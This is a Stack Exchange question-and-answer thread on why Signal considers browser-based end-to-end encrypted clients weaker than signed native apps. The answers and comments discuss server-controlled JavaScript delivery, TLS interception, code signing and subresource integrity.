40

I’ve read about E2EE (end to end encryption) of Signal in web clients on a Signal Community discussion forum, and wonder why they say that the browser is insecure for E2EE and native apps are secure.

I think the security issues for clients are the same. It can be harder in various systems based on their security polices, but all of the clients are prone to various attack surfaces like MITM, viruses and rats and other malware. And something more important they emphasise is the delivery for javascript files, but doesn’t that use HTTPS? I guess if anyone could break the HTTPS security they can do anything more dangerous than what we think about.

We want to develop some chat service like Signal with a web client, but this article confused us. Should we ship a web client or not? Please explain this.

multithr3at3d
  • 12,355
  • 3
  • 29
  • 42
SeyyedKhandon
  • 517
  • 1
  • 4
  • 7
  • 3
    In addition to the problems discussed on this thread and in the thread on the signal community discussion forum - another problem to consider is storage of messages. The smartphone apps store messages locally on the phone after downloading the encrypted messages from the signal server and decrypting the messages locally. Would a web client do the same thing? If so, where would the plaintext messages be stored? In the browser localstorage? If so, does storing plaintext messages in localstorage open new attack vectors? – mti2935 Oct 05 '20 at 16:47

2 Answers2

41

Yes HTTPS is used. The thread doesn't say that the web app will be completely insecure, instead it says

This effectively reduces the security of your end-to-end encrypted communication to that of your SSL connection to the server

Which means that anyone who can control the SSL connection to the server can now intercept and eavesdrop on your e2ee communications. So who exactly can control the SSL connection?

Well, if a (possibly state-level) attacker controls/compromises a CA, they could issue a fraudulent certificate for the Signal server and attempt to MitM the SSL connection (this threat is limited, but not eliminated, by the use of certificate transparency.) As @multithr3at3d pointed out, TLS inspection proxies at workplaces are a much more likely form of MiTM and could cause problems if your employer was interested in compromising your private conversation. However, in such a case, the employer owns the machine and would probably just install a keylogger on it, so you would have bigger problems.

However, the larger problem here is that the SSL connection, as well as the content being served, is controlled by the Signal server. This means that if the server is compromised or goes rogue (which can easily be achieved by a government serving Signal a subpoena or the like), then it can easily modify the javascript files served to the client in a way that allows them to intercept the communications. This effectively defeats the point of end-to-end encryption, which is that nobody other than the sender and the recipient should be able to read the contents of the communication, since the server now has the power to compromise the communications at will.

This threat is amplified by the fact that such malicious modification of the code served can be done in a targeted manner. The server can ensure that only a specific user/client is served the modified malicious code. This significantly reduces the chances of the modifications being detected and exposed.

Actually we want to develop some chat service like signal with web-client, but this article made us confuse about should we ship a web-client or not, can anybody please explain it?

This depends on your threat-model (or rather the threat-model of the intended audience of your chat service). Will those people just be using it for chatting with friends or communicating with colleagues? Or will it be used by whistle blowers trying to coordinate the disclosure of classified information with journalists? You will have to consider whether the risk outweighs the benefits and decide for yourself whether or not to ship a web client.

If its the former, then having a web client will not be a very big issue. This is closer to the use-case of WhatsApp and WhatsApp does have a web client.

If its the latter, then you had best follow Signal and stick to using desktop clients and apps which can be signed and their integrity verified.


As evident from the comments some people are confused about why these issues don't apply to the app and desktop client.

The reason is simple. The app/desktop client has to be downloaded once. It is also digitally signed so its integrity can easily be verified. The code signing key can be split among multiple developers, potentially located in different jurisdictions, so that one rogue developer cannot release a malicious update by themselves. If you are paranoid, you can also download Signal's publicly available source code and compile it yourself, and then disable automatic updates. If Signal attempts to publish a malicious update, they will have to publish its source code as well, and the chances are much higher that someone will notice the unexplained changes before any damage happens.

With a web app things aren't so simple. First of all, the TLS key is always present on the server, so anybody with access can steal it, and a single government can gain access to it with a subpoena (unlike a split code signing key, which would need the collaboration of multiple governments if the developers are in different countries). Even if the web pages are digitally signed, manually checking their integrity and ensuring they match the publicly available source code every time is absolutely impractical. Secondly, a web app consists of several web pages. Checking the integrity of all of these even once would be a painstakingly difficult task.

nobody
  • 11,251
  • 1
  • 41
  • 60
  • I think that companies using TLS inspection proxies for outbound traffic are a more likely issue than CA compromise or rogue server. The same compromised/rogue issues could likely be said for their app's development system as well. – multithr3at3d Sep 06 '20 at 11:46
  • @multithr3at3d Yes you're right, TLS inspection proxies would be an issue as well, although I don't think there are many employers that actively modify the contents of the web pages maliciously. As for the second part of your comment, I don't quite get what you mean. – nobody Sep 06 '20 at 12:07
  • 7
    Why aren't all the same reasons as threat to the app (instead of a web client)? For example if the servers are compromised how would using the app be any different? – northerner Sep 06 '20 at 21:36
  • 8
    Excellent answer, especially highlighting that the content served is controlled by the Signal server, and `'This means that if the server is compromised or goes rogue ..., then it can easily modify the js files served to the client in a way that allows them to intercept the communications'`. In other words - if you can't trust the Signal server with your secrets, then how can you trust the Signal server to serve secure code? This is the infamous 'chicken-and-egg' problem when it comes to browser crypto. – mti2935 Sep 06 '20 at 22:15
  • 6
    I don't see how any of this is relevant. As mentioned, exactly the same thing applies to mobile and desktop clients. That's why there's E2E encryption on top of the client-server encryption, for all clients. – OrangeDog Sep 06 '20 at 22:32
  • 5
    @OrangeDog I imagine the fact that you only install those clients once, rather than having to download potentially-compromised files every time you load the page, is a factor. Though that assumes the clients don't have an update server that can be compromised. – Chris Hayes Sep 07 '20 at 00:08
  • 1
    @nobody My problem is, if we think the server has been compromised, so how could we trust in any of its actions like key exchanging and etc. So, in this case we should consider the server is not a secure place and it is an attacker, so how is this gonna be secure with other clients than web? and if it is about the government, how should we now the served binary for server is not a malicious at the first place? – SeyyedKhandon Sep 07 '20 at 12:40
  • @SeyyedKhandon For the first part of your question, you can't, which is why you should be authenticating the identity of your contacts [through a separate channel](https://en.wikipedia.org/wiki/Signal_Protocol#Authentication) – nobody Sep 07 '20 at 12:46
  • 1
    @SeyyedKhandon For the second part, Signal does this by publishing its source code so anybody can review it, compile it and compare it with the binaries that the server provides. – nobody Sep 07 '20 at 12:48
  • @nobody , So I've an idea about the first problem you have noted, how about to write a browser extension, and tell the web browser users to download and install it from (e.g. chrome) and it checkes for us about integrity/sign of files and other stuffs like what you have told for the first. – SeyyedKhandon Sep 07 '20 at 14:41
  • @nobody for the second part, yeah i know the code is opensource and is available at github, but how do we know the real binary which is running is the same as the one on signal server? – SeyyedKhandon Sep 07 '20 at 14:43
  • @SeyyedKhandon You check if its signature is valid when you download it. Once you have verified its integrity, the file can't magically change itself. If you can get the user to install an extension, then you can run your entire application through the extension which removes the need for a web client – nobody Sep 07 '20 at 15:05
  • @nobody, how do you check a server's signature for checking it is not crafted? for the second part, I think develop the entire app as an extension is really exhaustive, but the extension which i mentioned, is something like `verifier` which has a job like google authenticator but for our needs in these situations... – SeyyedKhandon Sep 07 '20 at 15:32
  • 1
    Checking integrity of all resources referenced from a web application is *trivial* these days. Any sensible web packer will include [subresource integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity) and the browser already checks that. So it is just one signature that has to be checked, like for any other application. And the problem is really the same as for any *auto-updating* application. – Jan Hudec Sep 07 '20 at 19:49
  • @JanHudec Interesting. I didn't know about sub-resource integrity. Still, you will have to check every web page separately every single time you load it. Pretty sure an auto-update module of any reasonably secure application will check the integrity of any update it receives before installing. And you also have the option to disable auto-updates. – nobody Sep 07 '20 at 20:06
  • 2
    @nobody, I presume it would be a single-page app, so just one master HTML and everything served by a static server. And for the other side, if the attacker (most likely government) could take control of the HTTP server, they could probably take control of the build process too. But of course if government is a threat for you, you'll disable auto-updates and verify manually, and that is what you can't do with a web app. – Jan Hudec Sep 07 '20 at 20:24
  • 1
    @JanHudec If it's a single page web app, and all supporting files are referenced using `subresource integrity`, then it's plausible that a tech-savvy user could verify the integrity of the page by: loading the page in their browser, then saving the page to their system, then taking the checksum of the saved page, then comparing the checksum to a known-good checksum, then only proceeding if the checksum matches. Cumbersome for sure, but doable. – mti2935 Sep 07 '20 at 22:02
  • See https://security.stackexchange.com/questions/238441/solution-to-the-browser-crypto-chicken-and-egg-problem for some interesting ideas around a solution to this problem. – mti2935 Sep 20 '20 at 00:00
  • Javascript files can themselves be obfuscated and/or encrypted or cryptographically signed. I don't by the whole "you can't trust the browser BS" ... a browser/webapp is more secure from rogue apps on a system, especially on ChromeOS, than any native app could ever hope to be. – Ahi Tuna Mar 10 '21 at 23:56
0

Have to disagree with the top answer here. It's totally possible to create a reasonably secure web client for Signal. If encryption is done client side,then the SSL connection is redundant and completely unnecessary. Also package validation can be done client side in a secure fashion as well.

The real answer is that it would require a lot of resources to ALSO write and maintain a web client, and economically isn't supported be the ecosystem, currently. If that changes, an equally secure web client would make a lot of sense.

Joshua
  • 125
  • 3
  • 2
    Can you please elaborate on `Also package validation can be done client side in a secure fashion as well`? How would this work? – mti2935 Aug 31 '21 at 17:28
  • 4
    Sorry, but anyone who believes that its "totally possible to create a reasonably secure web client" doesn't really understand the problem. – CaffeineAddiction Aug 31 '21 at 21:14